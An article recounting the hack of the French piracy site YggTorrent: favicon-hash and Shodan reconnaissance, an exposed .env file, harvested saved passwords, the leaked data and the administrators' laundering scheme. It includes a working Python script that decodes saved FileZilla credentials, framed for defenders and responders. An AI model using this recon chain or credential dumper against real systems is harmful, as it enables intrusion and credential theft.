
How France's biggest pirate site fell
YggTorrent, France's largest illegal downloading site, had operated for nine years despite repeated attempts by the authorities to shut it down. It recently fell, not to law enforcement but to a hack. The breach exposed a substantial financial operation behind the site's image as a community of enthusiasts: reportedly around 10 million euros of profit over 2024 and 2025, laundered through a layered system the source compares to a cartel. This summary covers how the hacker found his way in, what he discovered, and what it means for the French illegal downloading scene.
The story begins with the site's genesis. Illegal downloading sites frequently emerge, get shut down by the authorities, or are abandoned by their administrators, who sometimes leave with the accumulated funds. It is an industry where the demise of one site usually leads to the birth of several others. YggTorrent, following in the footsteps of an earlier major site, T411, became the leading French-speaking reference for downloading films, software, and video games. It even ranked among the 35 most visited sites in France.
However, on March 3rd the site disappeared, not because of the authorities but because of a single individual, Groloum, assisted by two friends. Groloum hacked the site and published almost all of its content, including the user databases, not just the torrent files. Unlike open sites such as The Pirate Bay, YggTorrent required registration. That built a community, gave the administrators more control over content, and made it harder for law enforcement to infiltrate.
Months before the hack, YggTorrent introduced a "turbo mode," a paid subscription offering unlimited downloads for €15 per month or a lifetime fee of €85. This was a significant change, as many users expected illegal downloading to be free. While free options remained, they were limited to five downloads per day with a 30-second wait between each. These changes, among others, began to agitate the community.
The site's operations relied on both administrators, who covered hosting costs and reaped substantial profits, and numerous volunteers. These volunteers included "teams" that uploaded pirated content and moderators who maintained order. These individuals were often unpaid or received site credits, leading to growing resentment as administrators implemented new rules from their "ivory tower."
A notable instance of this discontent involved the QTZ team, a major uploader responsible for 3,300 shared files. Their complaints led to them being banned by YggTorrent's administrators. This created a climate of online protest, with some speculating that the administrators might be planning an "exit scam"—shutting down the site and absconding with the accumulated funds from nine years of payments.
The entire unraveling of YggTorrent began with a favicon, the small icon a site serves for the browser tab. Groloum fetched YggTorrent's favicon, computed its hash, and searched Shodan (an internet-wide scanner that indexes exposed services, including the hash of the favicon each web server returns) for other hosts serving the same hash. Because the hash is computed from the icon's bytes alone, any server reusing the same icon matches regardless of its domain or IP address. That led him to a previously unknown pre-production server: hidden in the sense that nothing linked to it, yet catalogued by Shodan like any other reachable host.
Having found the server, Groloum ran an Nmap port scan, which showed 13 open ports and no firewall in front of the host. He focused on port 443, where the web server had directory listing enabled, so the document root could be browsed like a file share. In it he found a development checkout of YggTorrent's future official API and, critically, its `.env` file. That file held an incredible discovery: a root login with no password, along with private keys stored in plain text. A `.env` file is where web frameworks keep deployment secrets; it should never sit inside a directory the web server can serve.
On another port, 9306 (the port Sphinx and Manticore search servers use by default for their MySQL-protocol interface), Groloum could read a database directly. Among the text files there he found a Windows setup configuration file that should have been deleted once installation finished; it contained an administrator password for the pre-production server. He then realized that the server was also being used as a personal computer by one of the administrators, a sign of how lax the operational security was.
With that access, Groloum did nothing exotic. He opened Chrome's saved-password store on the server, which was readable in plain text from that session, and found credentials for FileZilla, the FTP/SFTP client the developers used to push code to the different servers. FileZilla's site manager keeps the saved password for every configured server, so that one client gave Groloum access not to one server but to all of YggTorrent's.
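The last step of that chain, as an added example (not code from the article or from anyone involved): reading the saved sites out of a FileZilla `sitemanager.xml`. The XML below is constructed to mirror FileZilla's real format (on Windows the file lives under `%APPDATA%\FileZilla\sitemanager.xml`). Without a master password, each site's password is stored merely base64-encoded as `<Pass encoding="base64">`; once a master password is set FileZilla writes `<Pass encoding="crypt">` instead, which cannot be opened from the file alone. Hosts, users and passwords are invented.

```python
"""Recover saved credentials from a FileZilla sitemanager.xml.

Added example. SAMPLE_SITEMANAGER is constructed to match FileZilla's layout;
every host, user and password in it is invented.
"""
import base64
import xml.etree.ElementTree as ET

# FileZilla's <Protocol> codes for the two transports used in the sample.
PROTOCOL_NAMES = {"0": "ftp", "1": "sftp"}

SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <Servers>
    <Server>
      <Host>203.0.113.10</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>preprod</Name>
    </Server>
    <Server>
      <Host>203.0.113.20</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>www</User>
      <Pass encoding="base64">czNjcmV0</Pass>
      <Name>api</Name>
    </Server>
    <Server>
      <Host>203.0.113.30</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>root</User>
      <Pass encoding="crypt">AAAAAAAAAAAAAAAAAAAAAA==</Pass>
      <Name>db (saved with a master password; placeholder ciphertext)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def recover_filezilla_credentials(xml_text: str) -> list:
    """Return one record per saved site; 'password' is None when protected."""
    root = ET.fromstring(xml_text)
    sites = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        encoding = pass_el.get("encoding") if pass_el is not None else None
        if pass_el is not None and encoding == "base64":
            # No master password: the stored value is just base64 of the secret.
            password = base64.b64decode(pass_el.text or "").decode("utf-8")
        else:
            # "crypt" means a master password protects it; the file is not enough.
            password = None
        sites.append({
            "name": server.findtext("Name"),
            "host": server.findtext("Host"),
            "port": int(server.findtext("Port") or 0),
            "protocol": PROTOCOL_NAMES.get(server.findtext("Protocol"), "other"),
            "user": server.findtext("User"),
            "password": password,
            "protected": encoding == "crypt",
        })
    return sites


def exposed_hosts(sites: list) -> list:
    """Logins that the file alone is enough to use, as user@host:port."""
    return [f"{s['user']}@{s['host']}:{s['port']}" for s in sites if s["password"]]


if __name__ == "__main__":
    found = recover_filezilla_credentials(SAMPLE_SITEMANAGER)
    for site in found:
        print(site)
    print("immediately usable:", exposed_hosts(found))
```

Two practical consequences follow. For the defender, a developer workstation or shared pre-production box that carries a site manager like this is a credential store for every environment it can reach and deserves the same protection as production; setting FileZilla's master password, or better, using SSH keys held in an agent rather than stored passwords, turns the file from a skeleton key into a list of host names. For the incident responder, the same parser run over an image of the compromised host enumerates exactly which servers the attacker could reach next.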
From a single favicon, Groloum gained access to four servers, seven databases, 6.6 million user accounts, 13 payment processors, and 15 crypto wallets, totaling 19 GB of data. He then published an archive of this data, 11 GB after removing certain sensitive information. Groloum deliberately omitted user IP addresses, emails, and password hashes to avoid leaking the data of 6.6 million users, and even sent a message to ARCOM (the French audiovisual and digital communications regulator, which handles anti-piracy enforcement) apologizing for not including the IP addresses, implicitly confirming that he possessed them.
The published archive contained various damning revelations:
- **Bank transaction logs:** Payments transited through a YggTorrent server before reaching the payment processor, an unusual and insecure practice.
- **Full source code:** Analysis of the code revealed peculiar behaviors, such as not offering pornographic content to users identified as North African.
- **User accounts:** Millions of accounts were exposed, including pseudonyms, ages, and download histories. Groloum later admitted that leaving the pseudonyms was a mistake, as it allowed for correlations.
- **Internal YggTorrent documents:** These included the organizational chart, identifying two main administrators, "Oracle" (located in Morocco) and "Destroy," both using pseudonyms.
- **Technical evidence of malpractice:** Groloum claimed that password hashes were stored as MD5. MD5 is a fast general-purpose hash, not a password hash: leaked digests can be tested against wordlists at billions of guesses per second, and without a per-user salt one precomputed table cracks every account at once. He also found a `security.php` file that handled card-payment logs before passing them on to the payment processor.
- **Cryptocurrency wallet scanner:** A script disguised as an "image Carousel Manager" was found to execute in the browser of every visitor, scanning for the presence of cryptocurrency wallets like MetaMask. The purpose of this was unclear, but it allowed administrators to know if users possessed crypto wallets. The combination of user names, emails, IP addresses, download histories, and crypto wallet presence raised serious privacy concerns.
Groloum's revelations extended to the financial scale of the operation, estimating YggTorrent's profits at 10 million euros for 2024 and 2025 (5 million annually), with server costs estimated at €500,000. This suggested Oracle and Destroy were making substantial gains. He also detailed their money laundering system:
- **Proxy domains:** 36 proxy domains were used.
- **Fake e-commerce sites:** Payments were routed through dozens of fake e-commerce sites.
- **Payment processors:** Funds arrived on platforms like PayPal or Stripe, disguised as t-shirt purchases.
- **Crypto conversion:** Funds were converted into cryptocurrency via platforms like Paygate.
- **Crypto mixer and Monero:** A mixer, Tornado Cash (which operates on Ethereum and compatible chains), was used to break the link between deposits and withdrawals, and the funds were then converted into Monero, a cryptocurrency designed to be untraceable, to obscure the trail further.
- **Anonymous wallets:** Finally, funds were withdrawn into anonymous wallets.
This sophisticated money laundering infrastructure contrasted sharply with the site's poor security practices. Groloum also uncovered that YggTorrent was actively engaging in DDoS attacks against its competitors, indicating a fierce struggle for market dominance.
In response, YggTorrent's team initially denied the allegations, claiming that bank cards were not stored (which was true) and promising a return in 12 days with a surprise. However, the next day, they posted a message declaring that "the entertainment landscape has changed," listing legitimate streaming services like Canal+, Netflix, and France TV, and announcing their decision to sell the domain name but not for illegal activities. This suggested that the hack had utterly crippled them, forcing an immediate closure. It was speculated that they either lacked proper backups or seized the opportunity to exit.
Weeks later, YggTorrent's administrators resurfaced, claiming to have identified Groloum. In a blog post on "grosou.fun" they stated that they had received a blackmail email on March 2nd (the day before the hack) demanding $100,000 to prevent the data leak. They also accused Groloum of filing a fraudulent abuse report with Cloudflare, alleging that YggTorrent's server was a C2 (command and control) server hosting malware; according to them, he had written a ransomware sample himself, submitted it to antivirus vendors, and then planted it on their server to justify the Cloudflare takedown request.
The administrators believed Groloum's motive stemmed from frustration. In December, he had allegedly tried to "bot" the site to circumvent its rules and download content more easily. YggTorrent intervened, fixing the vulnerabilities and impacting Groloum's project. This, they suggested, led him to seek a new way to access content, inadvertently discovering the site's massive vulnerabilities through the favicon method. Essentially, they claimed he just wanted to watch movies without YggTorrent's rules, but stumbled upon a gaping security flaw.
YggTorrent's admins also claimed to unmask Groloum as "Uu dev" on GitHub, a 23-year-old French reverse engineering student. Evidence supporting this included a GitHub project named "Ciao YggTorrent" containing the pre-production server's address and a key, uploaded just before the leak.
Groloum, in an interview with a "warez" site, denied the blackmail email, calling it a fabrication. Regarding the C2 server claim, he cryptically stated, "It is possible that I am not entirely innocent." As for his identity, he responded, "The young woman you accuse of being Groloum is delighted by the attention you are giving her," implying he was pleased with the publicity.
The site's closure is now confirmed, and new platforms are emerging to fill the void. Groloum himself, in his initial leak, suggested several alternatives, Lacal, Thor 9, and Gemini, all centralized platforms similar to YggTorrent. He initially withheld C411 because he suspected a connection to YggTorrent's administrators, but later clarified that it was safe. A new decentralized model, "Collectify," has also emerged, aiming to avoid central control and to address the problems of moderation and authority that the YggTorrent affair exposed.